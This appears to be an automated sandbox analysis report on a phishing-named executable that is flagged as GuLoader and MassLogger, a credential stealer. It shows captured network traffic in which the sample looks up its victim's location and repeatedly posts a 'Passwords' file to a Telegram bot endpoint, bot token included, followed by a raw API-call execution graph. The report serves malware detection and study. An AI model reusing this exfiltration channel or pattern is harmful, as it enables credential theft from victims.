                                                                                                                            2024-12-03 14:20:28 UTC85OUTGET /xml/8.46.123.228 HTTP/1.1
                                                                                                                            Host: reallyfreegeoip.org
                                                                                                                            Connection: Keep-Alive
                                                                                                                            2024-12-03 14:20:28 UTC878INHTTP/1.1 200 OK
                                                                                                                            Date: Tue, 03 Dec 2024 14:20:28 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 362
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                            CF-Cache-Status: HIT
                                                                                                                            Age: 113051
                                                                                                                            Last-Modified: Mon, 02 Dec 2024 06:56:17 GMT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ABuClFZT0pV54mFjatnlTZsU9qELRBb%2FuTodYEfq2M%2B1Cs62d93qqZNO3f2jroG2RKt83bezSBQ4vYR2%2FXlCodJFBgKtEGuNfY8I%2FxALECZ9f0VwjS8nnpE3uZhXAhYcU4fnWKJe"}],"group":"cf-nel","max_age":604800}
                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8ec432968b1a18c4-EWR
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1707&min_rtt=1706&rtt_var=641&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1703617&cwnd=169&unsent_bytes=0&cid=8e2d4b20b51a596f&ts=478&x=0"
                                                                                                                            2024-12-03 14:20:28 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                            Data Ascii: <Response><IP>8.46.123.228</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            3192.168.2.749903149.154.167.2204433824C:\Users\user\Desktop\IBAN payment confirmation.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-03 14:20:36 UTC299OUTPOST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.228 HTTP/1.1
                                                                                                                            Content-Type: multipart/form-data; boundary================8dd1387340d4cc4
                                                                                                                            Host: api.telegram.org
                                                                                                                            Content-Length: 1090
                                                                                                                            Connection: Keep-Alive
                                                                                                                            2024-12-03 14:20:36 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 33 38 37 33 34 30 64 34 63 63 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                            Data Ascii: --===============8dd1387340d4cc4Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                            2024-12-03 14:20:36 UTC346INHTTP/1.1 400 Bad Request
                                                                                                                            Server: nginx/1.18.0
                                                                                                                            Date: Tue, 03 Dec 2024 14:20:36 GMT
                                                                                                                            Content-Type: application/json
                                                                                                                            Content-Length: 56
                                                                                                                            Connection: close
                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                            2024-12-03 14:20:36 UTC56INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 30 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4c 6f 67 67 65 64 20 6f 75 74 22 7d
                                                                                                                            Data Ascii: {"ok":false,"error_code":400,"description":"Logged out"}


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            4192.168.2.749913149.154.167.2204433824C:\Users\user\Desktop\IBAN payment confirmation.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-03 14:20:40 UTC299OUTPOST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.228 HTTP/1.1
                                                                                                                            Content-Type: multipart/form-data; boundary================8dd13b68e35914e
                                                                                                                            Host: api.telegram.org
                                                                                                                            Content-Length: 1090
                                                                                                                            Connection: Keep-Alive
                                                                                                                            2024-12-03 14:20:40 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 33 62 36 38 65 33 35 39 31 34 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                            Data Ascii: --===============8dd13b68e35914eContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                            2024-12-03 14:20:40 UTC346INHTTP/1.1 400 Bad Request
                                                                                                                            Server: nginx/1.18.0
                                                                                                                            Date: Tue, 03 Dec 2024 14:20:40 GMT
                                                                                                                            Content-Type: application/json
                                                                                                                            Content-Length: 56
                                                                                                                            Connection: close
                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                            2024-12-03 14:20:40 UTC56INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 30 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4c 6f 67 67 65 64 20 6f 75 74 22 7d
                                                                                                                            Data Ascii: {"ok":false,"error_code":400,"description":"Logged out"}


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            5192.168.2.749926149.154.167.2204433824C:\Users\user\Desktop\IBAN payment confirmation.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-03 14:20:44 UTC275OUTPOST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.228 HTTP/1.1
                                                                                                                            Content-Type: multipart/form-data; boundary================8dd13f0a3b04275
                                                                                                                            Host: api.telegram.org
                                                                                                                            Content-Length: 1090
                                                                                                                            2024-12-03 14:20:44 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 33 66 30 61 33 62 30 34 32 37 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                            Data Ascii: --===============8dd13f0a3b04275Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                            2024-12-03 14:20:45 UTC346INHTTP/1.1 400 Bad Request
                                                                                                                            Server: nginx/1.18.0
                                                                                                                            Date: Tue, 03 Dec 2024 14:20:45 GMT
                                                                                                                            Content-Type: application/json
                                                                                                                            Content-Length: 56
                                                                                                                            Connection: close
                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                            2024-12-03 14:20:45 UTC56INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 30 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4c 6f 67 67 65 64 20 6f 75 74 22 7d
                                                                                                                            Data Ascii: {"ok":false,"error_code":400,"description":"Logged out"}


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            6192.168.2.749935149.154.167.2204433824C:\Users\user\Desktop\IBAN payment confirmation.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-03 14:20:48 UTC275OUTPOST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.228 HTTP/1.1
                                                                                                                            Content-Type: multipart/form-data; boundary================8dd141c978a7e02
                                                                                                                            Host: api.telegram.org
                                                                                                                            Content-Length: 1090
                                                                                                                            2024-12-03 14:20:48 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 34 31 63 39 37 38 61 37 65 30 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                            Data Ascii: --===============8dd141c978a7e02Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                            2024-12-03 14:20:48 UTC346INHTTP/1.1 400 Bad Request
                                                                                                                            Server: nginx/1.18.0
                                                                                                                            Date: Tue, 03 Dec 2024 14:20:48 GMT
                                                                                                                            Content-Type: application/json
                                                                                                                            Content-Length: 56
                                                                                                                            Connection: close
                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                            2024-12-03 14:20:48 UTC56INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 30 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4c 6f 67 67 65 64 20 6f 75 74 22 7d
                                                                                                                            Data Ascii: {"ok":false,"error_code":400,"description":"Logged out"}


                                                                                                                            Click to jump to process

                                                                                                                            Click to jump to process

                                                                                                                            Click to dive into process behavior distribution

                                                                                                                            Click to jump to process

                                                                                                                            Target ID:0
                                                                                                                            Start time:09:18:42
                                                                                                                            Start date:03/12/2024
                                                                                                                            Path:C:\Users\user\Desktop\IBAN payment confirmation.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Users\user\Desktop\IBAN payment confirmation.exe"
                                                                                                                            Imagebase:0x400000
                                                                                                                            File size:715'594 bytes
                                                                                                                            MD5 hash:B134B557B86A160168DE0C56BA982EA6
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1943129976.0000000005351000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            Reputation:low
                                                                                                                            Has exited:true

                                                                                                                            Target ID:11
                                                                                                                            Start time:10:41:54
                                                                                                                            Start date:03/12/2024
                                                                                                                            Path:C:\Users\user\Desktop\IBAN payment confirmation.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Users\user\Desktop\IBAN payment confirmation.exe"
                                                                                                                            Imagebase:0x400000
                                                                                                                            File size:715'594 bytes
                                                                                                                            MD5 hash:B134B557B86A160168DE0C56BA982EA6
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 0000000B.00000002.2529825283.000000003705A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2529825283.000000003705A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000B.00000002.2529825283.000000003705A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            Reputation:low
                                                                                                                            Has exited:false

                                                                                                                            Reset < >

                                                                                                                              Execution Graph

                                                                                                                              Execution Coverage:20.1%
                                                                                                                              Dynamic/Decrypted Code Coverage:15.2%
                                                                                                                              Signature Coverage:18.9%
                                                                                                                              Total number of Nodes:1510
                                                                                                                              Total number of Limit Nodes:45
                                                                                                                              execution_graph 4980 10001000 4983 1000101b 4980->4983 4990 1000152e 4983->4990 4985 10001020 4986 10001024 4985->4986 4987 10001027 GlobalAlloc 4985->4987 4988 10001555 3 API calls 4986->4988 4987->4986 4989 10001019 4988->4989 4991 10001243 3 API calls 4990->4991 4992 10001534 4991->4992 4993 1000153a 4992->4993 4994 10001546 GlobalFree 4992->4994 4993->4985 4994->4985 4995 401d41 GetDC GetDeviceCaps 4996 402b1d 18 API calls 4995->4996 4997 401d5f MulDiv ReleaseDC 4996->4997 4998 402b1d 18 API calls 4997->4998 4999 401d7e 4998->4999 5000 405f0c 18 API calls 4999->5000 5001 401db7 CreateFontIndirectW 5000->5001 5002 4024e8 5001->5002 5003 401a42 5004 402b1d 18 API calls 5003->5004 5005 401a48 5004->5005 5006 402b1d 18 API calls 5005->5006 5007 4019f0 5006->5007 5008 404243 lstrcpynW lstrlenW 5009 402746 5010 402741 5009->5010 5010->5009 5011 402756 FindNextFileW 5010->5011 5012 4027a8 5011->5012 5014 402761 5011->5014 5015 405eea lstrcpynW 5012->5015 5015->5014 5016 401cc6 5017 402b1d 18 API calls 5016->5017 5018 401cd9 SetWindowLongW 5017->5018 5019 4029c7 5018->5019 4136 401dc7 4144 402b1d 4136->4144 4138 401dcd 4139 402b1d 18 API calls 4138->4139 4140 401dd6 4139->4140 4141 401de8 EnableWindow 4140->4141 4142 401ddd ShowWindow 4140->4142 4143 4029c7 4141->4143 4142->4143 4145 405f0c 18 API calls 4144->4145 4146 402b31 4145->4146 4146->4138 5027 4045ca 5028 4045f6 5027->5028 5029 404607 5027->5029 5088 4056aa GetDlgItemTextW 5028->5088 5031 404613 GetDlgItem 5029->5031 5037 404672 5029->5037 5033 404627 5031->5033 5032 404601 5035 40617e 5 API calls 5032->5035 5036 40463b SetWindowTextW 5033->5036 5041 4059e0 4 API calls 5033->5041 5034 404756 5038 4048f7 5034->5038 5090 4056aa GetDlgItemTextW 5034->5090 5035->5029 5042 40412f 19 API calls 5036->5042 5037->5034 5037->5038 5043 405f0c 18 API calls 5037->5043 5040 404196 8 API calls 5038->5040 5045 40490b 5040->5045 5046 404631 5041->5046 5047 404657 5042->5047 5048 4046e6 SHBrowseForFolderW 5043->5048 5044 404786 5049 405a3d 18 API calls 5044->5049 5046->5036 5055 405935 3 API calls 5046->5055 5050 40412f 19 API calls 5047->5050 5048->5034 5051 4046fe CoTaskMemFree 5048->5051 5052 40478c 5049->5052 5053 404665 5050->5053 5054 405935 3 API calls 5051->5054 5091 405eea lstrcpynW 5052->5091 5089 404164 SendMessageW 5053->5089 5057 40470b 5054->5057 5055->5036 5060 404742 SetDlgItemTextW 5057->5060 5064 405f0c 18 API calls 5057->5064 5059 40466b 5062 406254 3 API calls 5059->5062 5060->5034 5061 4047a3 5063 406254 3 API calls 5061->5063 5062->5037 5071 4047ab 5063->5071 5065 40472a lstrcmpiW 5064->5065 5065->5060 5068 40473b lstrcatW 5065->5068 5066 4047ea 5092 405eea lstrcpynW 5066->5092 5068->5060 5069 4047f1 5070 4059e0 4 API calls 5069->5070 5072 4047f7 GetDiskFreeSpaceW 5070->5072 5071->5066 5075 405981 2 API calls 5071->5075 5077 40483c 5071->5077 5074 40481a MulDiv 5072->5074 5072->5077 5074->5077 5075->5071 5076 4048a6 5079 4048c9 5076->5079 5081 40140b 2 API calls 5076->5081 5077->5076 5078 404978 21 API calls 5077->5078 5080 404898 5078->5080 5093 404151 EnableWindow 5079->5093 5082 4048a8 SetDlgItemTextW 5080->5082 5083 40489d 5080->5083 5081->5079 5082->5076 5086 404978 21 API calls 5083->5086 5085 4048e5 5085->5038 5094 40455f 5085->5094 5086->5076 5088->5032 5089->5059 5090->5044 5091->5061 5092->5069 5093->5085 5095 404572 SendMessageW 5094->5095 5096 40456d 5094->5096 5095->5038 5096->5095 5097 401bca 5098 402b1d 18 API calls 5097->5098 5099 401bd1 5098->5099 5100 402b1d 18 API calls 5099->5100 5101 401bdb 5100->5101 5102 401beb 5101->5102 5104 402b3a 18 API calls 5101->5104 5103 401bfb 5102->5103 5105 402b3a 18 API calls 5102->5105 5106 401c06 5103->5106 5107 401c4a 5103->5107 5104->5102 5105->5103 5108 402b1d 18 API calls 5106->5108 5109 402b3a 18 API calls 5107->5109 5110 401c0b 5108->5110 5111 401c4f 5109->5111 5112 402b1d 18 API calls 5110->5112 5113 402b3a 18 API calls 5111->5113 5115 401c14 5112->5115 5114 401c58 FindWindowExW 5113->5114 5118 401c7a 5114->5118 5116 401c3a SendMessageW 5115->5116 5117 401c1c SendMessageTimeoutW 5115->5117 5116->5118 5117->5118 5119 40194b 5120 402b1d 18 API calls 5119->5120 5121 401952 5120->5121 5122 402b1d 18 API calls 5121->5122 5123 40195c 5122->5123 5124 402b3a 18 API calls 5123->5124 5125 401965 5124->5125 5126 401979 lstrlenW 5125->5126 5127 4019b5 5125->5127 5128 401983 5126->5128 5128->5127 5132 405eea lstrcpynW 5128->5132 5130 40199e 5130->5127 5131 4019ab lstrlenW 5130->5131 5131->5127 5132->5130 5136 4042cc 5138 4043fe 5136->5138 5139 4042e4 5136->5139 5137 404468 5140 404472 GetDlgItem 5137->5140 5141 40453a 5137->5141 5138->5137 5138->5141 5145 404439 GetDlgItem SendMessageW 5138->5145 5142 40412f 19 API calls 5139->5142 5143 4044fb 5140->5143 5144 40448c 5140->5144 5147 404196 8 API calls 5141->5147 5146 40434b 5142->5146 5143->5141 5148 40450d 5143->5148 5144->5143 5152 4044b2 6 API calls 5144->5152 5167 404151 EnableWindow 5145->5167 5150 40412f 19 API calls 5146->5150 5151 404535 5147->5151 5153 404523 5148->5153 5154 404513 SendMessageW 5148->5154 5156 404358 CheckDlgButton 5150->5156 5152->5143 5153->5151 5157 404529 SendMessageW 5153->5157 5154->5153 5155 404463 5158 40455f SendMessageW 5155->5158 5165 404151 EnableWindow 5156->5165 5157->5151 5158->5137 5160 404376 GetDlgItem 5166 404164 SendMessageW 5160->5166 5162 40438c SendMessageW 5163 4043b2 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5162->5163 5164 4043a9 GetSysColor 5162->5164 5163->5151 5164->5163 5165->5160 5166->5162 5167->5155 5168 4024cc 5169 402b3a 18 API calls 5168->5169 5170 4024d3 5169->5170 5173 405b56 GetFileAttributesW CreateFileW 5170->5173 5172 4024df 5173->5172 4207 1000278d 4208 100027dd 4207->4208 4209 1000279d VirtualProtect 4207->4209 4209->4208 5174 4019cf 5175 402b3a 18 API calls 5174->5175 5176 4019d6 5175->5176 5177 402b3a 18 API calls 5176->5177 5178 4019df 5177->5178 5179 4019e6 lstrcmpiW 5178->5179 5180 4019f8 lstrcmpW 5178->5180 5181 4019ec 5179->5181 5180->5181 4293 401e51 4294 402b3a 18 API calls 4293->4294 4295 401e57 4294->4295 4296 405194 25 API calls 4295->4296 4297 401e61 4296->4297 4311 405665 CreateProcessW 4297->4311 4300 401ec6 CloseHandle 4304 402793 4300->4304 4301 401e77 WaitForSingleObject 4302 401e89 4301->4302 4303 401e9b GetExitCodeProcess 4302->4303 4314 40628d 4302->4314 4305 401eba 4303->4305 4306 401ead 4303->4306 4305->4300 4309 401eb8 4305->4309 4318 405e31 wsprintfW 4306->4318 4309->4300 4312 401e67 4311->4312 4313 405694 CloseHandle 4311->4313 4312->4300 4312->4301 4312->4304 4313->4312 4315 4062aa PeekMessageW 4314->4315 4316 4062a0 DispatchMessageW 4315->4316 4317 401e90 WaitForSingleObject 4315->4317 4316->4315 4317->4302 4318->4309 4393 401752 4394 402b3a 18 API calls 4393->4394 4395 401759 4394->4395 4396 401781 4395->4396 4397 401779 4395->4397 4434 405eea lstrcpynW 4396->4434 4433 405eea lstrcpynW 4397->4433 4400 40177f 4404 40617e 5 API calls 4400->4404 4401 40178c 4402 405935 3 API calls 4401->4402 4403 401792 lstrcatW 4402->4403 4403->4400 4421 40179e 4404->4421 4405 40622d 2 API calls 4405->4421 4406 4017da 4407 405b31 2 API calls 4406->4407 4407->4421 4409 4017b0 CompareFileTime 4409->4421 4410 401870 4412 405194 25 API calls 4410->4412 4411 401847 4414 405194 25 API calls 4411->4414 4431 40185c 4411->4431 4413 40187a 4412->4413 4416 403062 46 API calls 4413->4416 4414->4431 4415 405eea lstrcpynW 4415->4421 4417 40188d 4416->4417 4418 4018a1 SetFileTime 4417->4418 4420 4018b3 CloseHandle 4417->4420 4418->4420 4419 405f0c 18 API calls 4419->4421 4422 4018c4 4420->4422 4420->4431 4421->4405 4421->4406 4421->4409 4421->4410 4421->4411 4421->4415 4421->4419 4427 4056c6 MessageBoxIndirectW 4421->4427 4432 405b56 GetFileAttributesW CreateFileW 4421->4432 4423 4018c9 4422->4423 4424 4018dc 4422->4424 4425 405f0c 18 API calls 4423->4425 4426 405f0c 18 API calls 4424->4426 4428 4018d1 lstrcatW 4425->4428 4429 4018e4 4426->4429 4427->4421 4428->4429 4430 4056c6 MessageBoxIndirectW 4429->4430 4430->4431 4432->4421 4433->4400 4434->4401 4435 402253 4436 402261 4435->4436 4437 40225b 4435->4437 4438 40226f 4436->4438 4440 402b3a 18 API calls 4436->4440 4439 402b3a 18 API calls 4437->4439 4441 402b3a 18 API calls 4438->4441 4443 40227d 4438->4443 4439->4436 4440->4438 4441->4443 4442 402b3a 18 API calls 4444 402286 WritePrivateProfileStringW 4442->4444 4443->4442 5182 4052d3 5183 4052f4 GetDlgItem GetDlgItem GetDlgItem 5182->5183 5184 40547f 5182->5184 5227 404164 SendMessageW 5183->5227 5185 4054b0 5184->5185 5186 405488 GetDlgItem CreateThread CloseHandle 5184->5186 5189 4054db 5185->5189 5190 405500 5185->5190 5191 4054c7 ShowWindow ShowWindow 5185->5191 5186->5185 5188 405365 5193 40536c GetClientRect GetSystemMetrics SendMessageW SendMessageW 5188->5193 5192 40553b 5189->5192 5195 405515 ShowWindow 5189->5195 5196 4054ef 5189->5196 5197 404196 8 API calls 5190->5197 5229 404164 SendMessageW 5191->5229 5192->5190 5200 405549 SendMessageW 5192->5200 5198 4053db 5193->5198 5199 4053bf SendMessageW SendMessageW 5193->5199 5202 405535 5195->5202 5203 405527 5195->5203 5201 404108 SendMessageW 5196->5201 5208 40550e 5197->5208 5205 4053e0 SendMessageW 5198->5205 5206 4053ee 5198->5206 5199->5198 5207 405562 CreatePopupMenu 5200->5207 5200->5208 5201->5190 5204 404108 SendMessageW 5202->5204 5209 405194 25 API calls 5203->5209 5204->5192 5205->5206 5211 40412f 19 API calls 5206->5211 5210 405f0c 18 API calls 5207->5210 5209->5202 5212 405572 AppendMenuW 5210->5212 5213 4053fe 5211->5213 5214 4055a2 TrackPopupMenu 5212->5214 5215 40558f GetWindowRect 5212->5215 5216 405407 ShowWindow 5213->5216 5217 40543b GetDlgItem SendMessageW 5213->5217 5214->5208 5218 4055bd 5214->5218 5215->5214 5219 40542a 5216->5219 5220 40541d ShowWindow 5216->5220 5217->5208 5221 405462 SendMessageW SendMessageW 5217->5221 5222 4055d9 SendMessageW 5218->5222 5228 404164 SendMessageW 5219->5228 5220->5219 5221->5208 5222->5222 5223 4055f6 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5222->5223 5225 40561b SendMessageW 5223->5225 5225->5225 5226 405644 GlobalUnlock SetClipboardData CloseClipboard 5225->5226 5226->5208 5227->5188 5228->5217 5229->5189 5230 402454 5231 402c44 19 API calls 5230->5231 5232 40245e 5231->5232 5233 402b1d 18 API calls 5232->5233 5234 402467 5233->5234 5235 40248b RegEnumValueW 5234->5235 5236 40247f RegEnumKeyW 5234->5236 5238 402793 5234->5238 5237 4024a4 RegCloseKey 5235->5237 5235->5238 5236->5237 5237->5238 5240 401ed4 5241 402b3a 18 API calls 5240->5241 5242 401edb 5241->5242 5243 40622d 2 API calls 5242->5243 5244 401ee1 5243->5244 5246 401ef2 5244->5246 5247 405e31 wsprintfW 5244->5247 5247->5246 5248 